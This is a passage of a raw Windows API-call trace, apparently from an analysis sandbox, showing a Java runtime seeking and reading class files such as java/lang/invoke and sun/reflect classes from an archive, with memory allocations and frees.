dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=50543345) returned 1 [0115.957] ReadFile (in: hFile=0x134, lpBuffer=0x208c140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x208c140*, lpNumberOfBytesRead=0x208c0c0*=0x1e, lpOverlapped=0x0) returned 1 [0115.958] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3033b3b, lpNewFilePointer=0x208c150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c150*=50543419) returned 1 [0115.958] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0xc46, lpNumberOfBytesRead=0x208c120, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208c120*=0xc46, lpOverlapped=0x0) returned 1 [0115.959] free (_Block=0x12ef4450) [0115.959] free (_Block=0x12e60690) [0116.117] strlen (_Str="java/lang/invoke/MethodHandleImpl$IntrinsicMethodHandle.class") returned 0x3d [0116.117] malloc (_Size=0x48) returned 0x12e60aa0 [0116.117] malloc (_Size=0xa0) returned 0x12dabe10 [0116.117] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414a98, lpNewFilePointer=0x208bd50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd50*=54610584) returned 1 [0116.117] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd20, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208bd20*=0xa0, lpOverlapped=0x0) returned 1 [0116.118] malloc (_Size=0x3e) returned 0x12e604b0 [0116.119] strlen (_Str="java/lang/invoke/MethodHandleImpl$IntrinsicMethodHandle.class") returned 0x3d [0116.119] strcpy (in: _Dest=0x208bed0, _Source="java/lang/invoke/MethodHandleImpl$IntrinsicMethodHandle.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$IntrinsicMethodHandle.class") returned="java/lang/invoke/MethodHandleImpl$IntrinsicMethodHandle.class" [0116.119] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3033355, lpNewFilePointer=0x208b950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b950*=50541397) returned 1 [0116.119] ReadFile (in: hFile=0x134, lpBuffer=0x208b9a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b920, lpOverlapped=0x0 | out: lpBuffer=0x208b9a0*, lpNumberOfBytesRead=0x208b920*=0x1e, lpOverlapped=0x0) returned 1 [0116.120] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30333b0, lpNewFilePointer=0x208b9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9b0*=50541488) returned 1 [0116.120] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0x741, lpNumberOfBytesRead=0x208b980, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208b980*=0x741, lpOverlapped=0x0) returned 1 [0116.120] free (_Block=0x12ef4410) [0116.121] free (_Block=0x12e60c80) [0116.623] strlen (_Str="java/lang/NoSuchFieldError.class") returned 0x20 [0116.623] malloc (_Size=0x48) returned 0x12e60c80 [0116.624] malloc (_Size=0xa0) returned 0x12dab7e0 [0116.624] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414a4a, lpNewFilePointer=0x208bed0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bed0*=54610506) returned 1 [0116.624] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bea0, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208bea0*=0xa0, lpOverlapped=0x0) returned 1 [0116.625] malloc (_Size=0x21) returned 0x12e67360 [0116.625] strlen (_Str="java/lang/NoSuchFieldError.class") returned 0x20 [0116.625] strcpy (in: _Dest=0x208c050, _Source="java/lang/NoSuchFieldError.class" | out: _Dest="java/lang/NoSuchFieldError.class") returned="java/lang/NoSuchFieldError.class" [0116.626] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30331f2, lpNewFilePointer=0x208bad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bad0*=50541042) returned 1 [0116.626] ReadFile (in: hFile=0x134, lpBuffer=0x208bb20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208baa0, lpOverlapped=0x0 | out: lpBuffer=0x208bb20*, lpNumberOfBytesRead=0x208baa0*=0x1e, lpOverlapped=0x0) returned 1 [0116.627] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3033230, lpNewFilePointer=0x208bb30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb30*=50541104) returned 1 [0116.627] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x208bb00, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bb00*=0x125, lpOverlapped=0x0) returned 1 [0116.628] free (_Block=0x12e604b0) [0116.628] free (_Block=0x12e60aa0) [0116.637] strlen (_Str="java/lang/IllegalAccessException.class") returned 0x26 [0116.637] malloc (_Size=0x48) returned 0x12e603c0 [0116.637] malloc (_Size=0xa0) returned 0x12dab100 [0116.637] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34149f6, lpNewFilePointer=0x208bbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbb0*=54610422) returned 1 [0116.637] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb80, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208bb80*=0xa0, lpOverlapped=0x0) returned 1 [0116.638] malloc (_Size=0x27) returned 0x12e67450 [0116.638] strlen (_Str="java/lang/IllegalAccessException.class") returned 0x26 [0116.638] strcpy (in: _Dest=0x208bd30, _Source="java/lang/IllegalAccessException.class" | out: _Dest="java/lang/IllegalAccessException.class") returned="java/lang/IllegalAccessException.class" [0116.638] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3033083, lpNewFilePointer=0x208b7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7b0*=50540675) returned 1 [0116.638] ReadFile (in: hFile=0x134, lpBuffer=0x208b800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b780, lpOverlapped=0x0 | out: lpBuffer=0x208b800*, lpNumberOfBytesRead=0x208b780*=0x1e, lpOverlapped=0x0) returned 1 [0116.639] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30330c7, lpNewFilePointer=0x208b810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b810*=50540743) returned 1 [0116.639] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x12b, lpNumberOfBytesRead=0x208b7e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b7e0*=0x12b, lpOverlapped=0x0) returned 1 [0116.640] free (_Block=0x12e67360) [0116.640] free (_Block=0x12e60c80) [0116.809] strlen (_Str="java/lang/invoke/LambdaFormEditor.class") returned 0x27 [0116.809] malloc (_Size=0x48) returned 0x12e60960 [0116.809] malloc (_Size=0xa0) returned 0x12daafa0 [0116.809] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34149a1, lpNewFilePointer=0x208b710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b710*=54610337) returned 1 [0116.809] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b6e0, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208b6e0*=0xa0, lpOverlapped=0x0) returned 1 [0116.810] malloc (_Size=0x28) returned 0x12e67ae0 [0116.810] strlen (_Str="java/lang/invoke/LambdaFormEditor.class") returned 0x27 [0116.810] strcpy (in: _Dest=0x208b890, _Source="java/lang/invoke/LambdaFormEditor.class" | out: _Dest="java/lang/invoke/LambdaFormEditor.class") returned="java/lang/invoke/LambdaFormEditor.class" [0116.811] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302ee2a, lpNewFilePointer=0x208b310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b310*=50523690) returned 1 [0116.811] ReadFile (in: hFile=0x134, lpBuffer=0x208b360, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b2e0, lpOverlapped=0x0 | out: lpBuffer=0x208b360*, lpNumberOfBytesRead=0x208b2e0*=0x1e, lpOverlapped=0x0) returned 1 [0116.812] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302ee6f, lpNewFilePointer=0x208b370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b370*=50523759) returned 1 [0116.812] ReadFile (in: hFile=0x134, lpBuffer=0x13029e00, nNumberOfBytesToRead=0x4214, lpNumberOfBytesRead=0x208b340, lpOverlapped=0x0 | out: lpBuffer=0x13029e00*, lpNumberOfBytesRead=0x208b340*=0x4214, lpOverlapped=0x0) returned 1 [0116.814] free (_Block=0x12e67450) [0116.815] free (_Block=0x12e603c0) [0116.838] strlen (_Str="java/lang/invoke/LambdaFormEditor$Transform$Kind.class") returned 0x36 [0116.838] malloc (_Size=0x48) returned 0x12e60690 [0116.838] malloc (_Size=0xa0) returned 0x12dac5a0 [0116.838] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341493d, lpNewFilePointer=0x208b840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b840*=54610237) returned 1 [0116.838] ReadFile (in: hFile=0x134, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b810, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x208b810*=0xa0, lpOverlapped=0x0) returned 1 [0116.839] malloc (_Size=0x37) returned 0x12ef4490 [0116.839] strlen (_Str="java/lang/invoke/LambdaFormEditor$Transform$Kind.class") returned 0x36 [0116.839] strcpy (in: _Dest=0x208b9c0, _Source="java/lang/invoke/LambdaFormEditor$Transform$Kind.class" | out: _Dest="java/lang/invoke/LambdaFormEditor$Transform$Kind.class") returned="java/lang/invoke/LambdaFormEditor$Transform$Kind.class" [0116.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302e708, lpNewFilePointer=0x208b440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b440*=50521864) returned 1 [0116.840] ReadFile (in: hFile=0x134, lpBuffer=0x208b490, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b410, lpOverlapped=0x0 | out: lpBuffer=0x208b490*, lpNumberOfBytesRead=0x208b410*=0x1e, lpOverlapped=0x0) returned 1 [0116.841] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302e75c, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50521948) returned 1 [0116.841] ReadFile (in: hFile=0x134, lpBuffer=0x13029e00, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x13029e00*, lpNumberOfBytesRead=0x208b470*=0x6ce, lpOverlapped=0x0) returned 1 [0116.842] free (_Block=0x12e67ae0) [0116.842] free (_Block=0x12e60960) [0116.851] malloc (_Size=0x48) returned 0x12e60550 [0116.851] malloc (_Size=0xa0) returned 0x12daafa0 [0116.851] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34148de, lpNewFilePointer=0x208b6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6b0*=54610142) returned 1 [0116.851] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b680, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208b680*=0xa0, lpOverlapped=0x0) returned 1 [0116.852] malloc (_Size=0x32) returned 0x12ef4d10 [0116.852] strlen (_Str="java/lang/invoke/LambdaFormEditor$Transform.class") returned 0x31 [0116.852] strcpy (in: _Dest=0x208b830, _Source="java/lang/invoke/LambdaFormEditor$Transform.class" | out: _Dest="java/lang/invoke/LambdaFormEditor$Transform.class") returned="java/lang/invoke/LambdaFormEditor$Transform.class" [0116.852] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302d3d7, lpNewFilePointer=0x208b2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2b0*=50516951) returned 1 [0116.852] ReadFile (in: hFile=0x134, lpBuffer=0x208b300, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b280, lpOverlapped=0x0 | out: lpBuffer=0x208b300*, lpNumberOfBytesRead=0x208b280*=0x1e, lpOverlapped=0x0) returned 1 [0116.854] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302d426, lpNewFilePointer=0x208b310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b310*=50517030) returned 1 [0116.854] ReadFile (in: hFile=0x134, lpBuffer=0x13029e00, nNumberOfBytesToRead=0x12e2, lpNumberOfBytesRead=0x208b2e0, lpOverlapped=0x0 | out: lpBuffer=0x13029e00*, lpNumberOfBytesRead=0x208b2e0*=0x12e2, lpOverlapped=0x0) returned 1 [0116.855] free (_Block=0x12ef4490) [0116.855] free (_Block=0x12e60690) [0116.858] strlen (_Str="java/lang/invoke/LambdaFormBuffer.class") returned 0x27 [0116.858] malloc (_Size=0x48) returned 0x12e60780 [0116.858] malloc (_Size=0xa0) returned 0x12daaef0 [0116.858] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414889, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=54610057) returned 1 [0116.858] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b900*=0xa0, lpOverlapped=0x0) returned 1 [0116.859] malloc (_Size=0x28) returned 0x12e67de0 [0116.859] strlen (_Str="java/lang/invoke/LambdaFormBuffer.class") returned 0x27 [0116.859] strcpy (in: _Dest=0x208bab0, _Source="java/lang/invoke/LambdaFormBuffer.class" | out: _Dest="java/lang/invoke/LambdaFormBuffer.class") returned="java/lang/invoke/LambdaFormBuffer.class" [0116.860] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302b31c, lpNewFilePointer=0x208b530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b530*=50508572) returned 1 [0116.860] ReadFile (in: hFile=0x134, lpBuffer=0x208b580, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b500, lpOverlapped=0x0 | out: lpBuffer=0x208b580*, lpNumberOfBytesRead=0x208b500*=0x1e, lpOverlapped=0x0) returned 1 [0116.861] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302b361, lpNewFilePointer=0x208b590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b590*=50508641) returned 1 [0116.861] ReadFile (in: hFile=0x134, lpBuffer=0x13029e00, nNumberOfBytesToRead=0x2076, lpNumberOfBytesRead=0x208b560, lpOverlapped=0x0 | out: lpBuffer=0x13029e00*, lpNumberOfBytesRead=0x208b560*=0x2076, lpOverlapped=0x0) returned 1 [0116.863] free (_Block=0x12ef4d10) [0116.863] free (_Block=0x12e60550) [0117.000] strlen (_Str="java/lang/invoke/BoundMethodHandle$SpeciesData$1.class") returned 0x36 [0117.000] malloc (_Size=0x48) returned 0x12e60c80 [0117.000] malloc (_Size=0xa0) returned 0x12dab7e0 [0117.000] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33263e3, lpNewFilePointer=0x208ce10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce10*=53634019) returned 1 [0117.000] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cde0, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208cde0*=0xa0, lpOverlapped=0x0) returned 1 [0117.002] malloc (_Size=0x37) returned 0x12ef4c50 [0117.002] strlen (_Str="java/lang/invoke/BoundMethodHandle$SpeciesData$1.class") returned 0x36 [0117.002] strcpy (in: _Dest=0x208cf90, _Source="java/lang/invoke/BoundMethodHandle$SpeciesData$1.class" | out: _Dest="java/lang/invoke/BoundMethodHandle$SpeciesData$1.class") returned="java/lang/invoke/BoundMethodHandle$SpeciesData$1.class" [0117.002] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16bf44f, lpNewFilePointer=0x208ca10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca10*=23852111) returned 1 [0117.002] ReadFile (in: hFile=0x134, lpBuffer=0x208ca60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c9e0, lpOverlapped=0x0 | out: lpBuffer=0x208ca60*, lpNumberOfBytesRead=0x208c9e0*=0x1e, lpOverlapped=0x0) returned 1 [0117.004] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16bf4a3, lpNewFilePointer=0x208ca70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca70*=23852195) returned 1 [0117.004] ReadFile (in: hFile=0x134, lpBuffer=0x13001e50, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x208ca40, lpOverlapped=0x0 | out: lpBuffer=0x13001e50*, lpNumberOfBytesRead=0x208ca40*=0x424, lpOverlapped=0x0) returned 1 [0117.005] free (_Block=0x12e67de0) [0117.005] free (_Block=0x12e60780) [0117.010] strlen (_Str="java/lang/invoke/BoundMethodHandle$Factory$1.class") returned 0x32 [0117.010] malloc (_Size=0x48) returned 0x12e60320 [0117.010] malloc (_Size=0xa0) returned 0x12dab470 [0117.010] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3326383, lpNewFilePointer=0x208cbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbf0*=53633923) returned 1 [0117.010] ReadFile (in: hFile=0x134, lpBuffer=0x12dab470, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cbc0, lpOverlapped=0x0 | out: lpBuffer=0x12dab470*, lpNumberOfBytesRead=0x208cbc0*=0xa0, lpOverlapped=0x0) returned 1 [0117.010] malloc (_Size=0x33) returned 0x12ef4790 [0117.010] strlen (_Str="java/lang/invoke/BoundMethodHandle$Factory$1.class") returned 0x32 [0117.010] strcpy (in: _Dest=0x208cd70, _Source="java/lang/invoke/BoundMethodHandle$Factory$1.class" | out: _Dest="java/lang/invoke/BoundMethodHandle$Factory$1.class") returned="java/lang/invoke/BoundMethodHandle$Factory$1.class" [0117.010] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16bf0b4, lpNewFilePointer=0x208c7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7f0*=23851188) returned 1 [0117.010] ReadFile (in: hFile=0x134, lpBuffer=0x208c840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c7c0, lpOverlapped=0x0 | out: lpBuffer=0x208c840*, lpNumberOfBytesRead=0x208c7c0*=0x1e, lpOverlapped=0x0) returned 1 [0117.011] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16bf104, lpNewFilePointer=0x208c850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c850*=23851268) returned 1 [0117.011] ReadFile (in: hFile=0x134, lpBuffer=0x13001e50, nNumberOfBytesToRead=0x34b, lpNumberOfBytesRead=0x208c820, lpOverlapped=0x0 | out: lpBuffer=0x13001e50*, lpNumberOfBytesRead=0x208c820*=0x34b, lpOverlapped=0x0) returned 1 [0117.011] free (_Block=0x12ef4c50) [0117.011] free (_Block=0x12e60c80) [0117.016] strlen (_Str="java/util/concurrent/ConcurrentHashMap$ReservationNode.class") returned 0x3c [0117.016] malloc (_Size=0x48) returned 0x12e60a50 [0117.016] malloc (_Size=0xa0) returned 0x12dabc00 [0117.016] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x334161a, lpNewFilePointer=0x208cb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb20*=53745178) returned 1 [0117.016] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208caf0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208caf0*=0xa0, lpOverlapped=0x0) returned 1 [0117.018] malloc (_Size=0x3d) returned 0x12e60cd0 [0117.019] strlen (_Str="java/util/concurrent/ConcurrentHashMap$ReservationNode.class") returned 0x3c [0117.019] strcpy (in: _Dest=0x208cca0, _Source="java/util/concurrent/ConcurrentHashMap$ReservationNode.class" | out: _Dest="java/util/concurrent/ConcurrentHashMap$ReservationNode.class") returned="java/util/concurrent/ConcurrentHashMap$ReservationNode.class" [0117.019] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x194931c, lpNewFilePointer=0x208c720, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c720*=26514204) returned 1 [0117.019] ReadFile (in: hFile=0x134, lpBuffer=0x208c770, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c6f0, lpOverlapped=0x0 | out: lpBuffer=0x208c770*, lpNumberOfBytesRead=0x208c6f0*=0x1e, lpOverlapped=0x0) returned 1 [0117.020] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1949376, lpNewFilePointer=0x208c780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c780*=26514294) returned 1 [0117.021] ReadFile (in: hFile=0x134, lpBuffer=0x13001e50, nNumberOfBytesToRead=0x2c0, lpNumberOfBytesRead=0x208c750, lpOverlapped=0x0 | out: lpBuffer=0x13001e50*, lpNumberOfBytesRead=0x208c750*=0x2c0, lpOverlapped=0x0) returned 1 [0117.021] free (_Block=0x12ef4790) [0117.021] free (_Block=0x12e60320) [0117.026] strlen (_Str="jdk/internal/org/objectweb/asm/FieldWriter.class") returned 0x30 [0117.026] malloc (_Size=0x48) returned 0x12e60a00 [0117.027] malloc (_Size=0xa0) returned 0x12dac2e0 [0117.027] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341482b, lpNewFilePointer=0x208c900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c900*=54609963) returned 1 [0117.027] ReadFile (in: hFile=0x134, lpBuffer=0x12dac2e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c8d0, lpOverlapped=0x0 | out: lpBuffer=0x12dac2e0*, lpNumberOfBytesRead=0x208c8d0*=0xa0, lpOverlapped=0x0) returned 1 [0117.028] malloc (_Size=0x31) returned 0x12ef4f90 [0117.028] strlen (_Str="jdk/internal/org/objectweb/asm/FieldWriter.class") returned 0x30 [0117.029] strcpy (in: _Dest=0x208ca80, _Source="jdk/internal/org/objectweb/asm/FieldWriter.class" | out: _Dest="jdk/internal/org/objectweb/asm/FieldWriter.class") returned="jdk/internal/org/objectweb/asm/FieldWriter.class" [0117.029] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302a398, lpNewFilePointer=0x208c500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c500*=50504600) returned 1 [0117.029] ReadFile (in: hFile=0x134, lpBuffer=0x208c550, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c4d0, lpOverlapped=0x0 | out: lpBuffer=0x208c550*, lpNumberOfBytesRead=0x208c4d0*=0x1e, lpOverlapped=0x0) returned 1 [0117.030] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x302a3e6, lpNewFilePointer=0x208c560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c560*=50504678) returned 1 [0117.030] ReadFile (in: hFile=0x134, lpBuffer=0x13001e50, nNumberOfBytesToRead=0xf36, lpNumberOfBytesRead=0x208c530, lpOverlapped=0x0 | out: lpBuffer=0x13001e50*, lpNumberOfBytesRead=0x208c530*=0xf36, lpOverlapped=0x0) returned 1 [0117.031] free (_Block=0x12e60cd0) [0117.031] free (_Block=0x12e60a50) [0117.033] strlen (_Str="jdk/internal/org/objectweb/asm/FieldVisitor.class") returned 0x31 [0117.034] malloc (_Size=0x48) returned 0x12e60b90 [0117.034] malloc (_Size=0xa0) returned 0x12daae40 [0117.034] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34147cc, lpNewFilePointer=0x208bec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bec0*=54609868) returned 1 [0117.034] ReadFile (in: hFile=0x134, lpBuffer=0x12daae40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be90, lpOverlapped=0x0 | out: lpBuffer=0x12daae40*, lpNumberOfBytesRead=0x208be90*=0xa0, lpOverlapped=0x0) returned 1 [0117.035] malloc (_Size=0x32) returned 0x12ef4d50 [0117.035] strlen (_Str="jdk/internal/org/objectweb/asm/FieldVisitor.class") returned 0x31 [0117.035] strcpy (in: _Dest=0x208c040, _Source="jdk/internal/org/objectweb/asm/FieldVisitor.class" | out: _Dest="jdk/internal/org/objectweb/asm/FieldVisitor.class") returned="jdk/internal/org/objectweb/asm/FieldVisitor.class" [0117.035] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3029f02, lpNewFilePointer=0x208bac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bac0*=50503426) returned 1 [0117.035] ReadFile (in: hFile=0x134, lpBuffer=0x208bb10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ba90, lpOverlapped=0x0 | out: lpBuffer=0x208bb10*, lpNumberOfBytesRead=0x208ba90*=0x1e, lpOverlapped=0x0) returned 1 [0117.037] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3029f51, lpNewFilePointer=0x208bb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb20*=50503505) returned 1 [0117.037] ReadFile (in: hFile=0x134, lpBuffer=0x13002f60, nNumberOfBytesToRead=0x447, lpNumberOfBytesRead=0x208baf0, lpOverlapped=0x0 | out: lpBuffer=0x13002f60*, lpNumberOfBytesRead=0x208baf0*=0x447, lpOverlapped=0x0) returned 1 [0117.038] free (_Block=0x12ef4f90) [0117.038] free (_Block=0x12e60a00) [0117.046] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0117.046] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0117.046] strlen (_Str="java/lang/invoke/BoundMethodHandle") returned 0x22 [0117.057] strlen (_Str="sun/reflect/UnsafeFieldAccessorFactory.class") returned 0x2c [0117.057] malloc (_Size=0x48) returned 0x12e60190 [0117.057] malloc (_Size=0xa0) returned 0x12dac9c0 [0117.057] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341709b, lpNewFilePointer=0x208c780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c780*=54620315) returned 1 [0117.057] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c750, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c750*=0xa0, lpOverlapped=0x0) returned 1 [0117.058] malloc (_Size=0x2d) returned 0x12ef4bd0 [0117.058] strlen (_Str="sun/reflect/UnsafeFieldAccessorFactory.class") returned 0x2c [0117.058] strcpy (in: _Dest=0x208c900, _Source="sun/reflect/UnsafeFieldAccessorFactory.class" | out: _Dest="sun/reflect/UnsafeFieldAccessorFactory.class") returned="sun/reflect/UnsafeFieldAccessorFactory.class" [0117.058] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a4aba, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=51006138) returned 1 [0117.058] ReadFile (in: hFile=0x134, lpBuffer=0x208c3d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x208c3d0*, lpNumberOfBytesRead=0x208c350*=0x1e, lpOverlapped=0x0) returned 1 [0117.060] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a4b04, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=51006212) returned 1 [0117.060] ReadFile (in: hFile=0x134, lpBuffer=0x12d61fa0, nNumberOfBytesToRead=0xf36, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x12d61fa0*, lpNumberOfBytesRead=0x208c3b0*=0xf36, lpOverlapped=0x0) returned 1 [0117.061] free (_Block=0x12ef4d50) [0117.061] free (_Block=0x12e60b90) [0117.068] strlen (_Str="sun/reflect/UnsafeStaticObjectFieldAccessorImpl.class") returned 0x35 [0117.069] malloc (_Size=0x48) returned 0x12e60640 [0117.069] malloc (_Size=0xa0) returned 0x12dabf70 [0117.069] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33d00d9, lpNewFilePointer=0x208c9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9b0*=54329561) returned 1 [0117.069] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c980, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208c980*=0xa0, lpOverlapped=0x0) returned 1 [0117.069] malloc (_Size=0x36) 